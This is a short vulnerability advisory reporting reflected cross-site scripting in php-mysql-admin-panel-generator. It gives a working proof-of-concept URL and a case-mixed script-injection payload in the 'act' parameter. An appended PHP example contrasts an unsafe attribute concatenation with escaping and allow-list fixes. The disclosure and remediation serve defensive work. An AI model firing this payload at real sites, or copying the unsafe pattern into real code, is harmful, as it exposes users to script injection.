Affected software: php-mysql-admin-panel-generator
Version: N/A
Type of vulnerability: XSS (Cross-Site Scripting)
Author: s7safe
Description:
php-mysql-admin-panel-generator is susceptible to cross-site scripting attacks, allowing malicious users to inject code into web pages, and other users will be affected when viewing web pages.
PoC:
Turn to http://192.168.146.130/generated/mysql2022-03-26_02-49/edit-db.php?act=%22%3E%3CScRiPt%3Ealert(%22xss%22)%3C%2FsCrIpT%3E
Payload: "><ScRiPt>alert("xss")<%2FsCrIpT>
Successful
Reason:
Failure to filter or escape special characters leads to vulnerabilities.
How to fix:
Escape special characters or filter them.
by s7safe
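
One way to apply the fix described in the report, as an added example that is not code from the project or from the reporter: it assumes the `act` parameter is reflected into an HTML attribute (suggested by the payload's leading `">`), and the function names and the allow-list of actions are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical allow-list: the real set of "act" values is not shown in the report.
const ALLOWED_ACTIONS = ['add', 'edit', 'delete'];

// Unsafe pattern (assumed): request data is concatenated into an attribute as-is.
function render_unsafe(string $act): string
{
    return '<input type="hidden" name="act" value="' . $act . '">';
}

// Output encoding for an HTML attribute context: ", ', <, > and & become entities,
// so the value cannot close the attribute or open a new tag.
function render_escaped(string $act): string
{
    $safe = htmlspecialchars($act, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="act" value="' . $safe . '">';
}

// Input validation: accept only known actions, fall back to a default otherwise.
function normalize_act(?string $act, string $default = 'edit'): string
{
    return in_array($act, ALLOWED_ACTIONS, true) ? $act : $default;
}

// The value from the report's PoC URL, URL-decoded as PHP presents it in $_GET.
$reported = '"><ScRiPt>alert("xss")</sCrIpT>';

// Attribute is closed early and the script tag becomes part of the markup.
echo render_unsafe($reported), PHP_EOL;

// Value stays inside the attribute as inert text.
echo render_escaped($reported), PHP_EOL;

// Unknown action is replaced by the default before it is ever rendered.
echo render_escaped(normalize_act($reported)), PHP_EOL;
```

Escaping at output is the primary control; the allow-list is a second layer for parameters that only ever take a fixed set of values.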

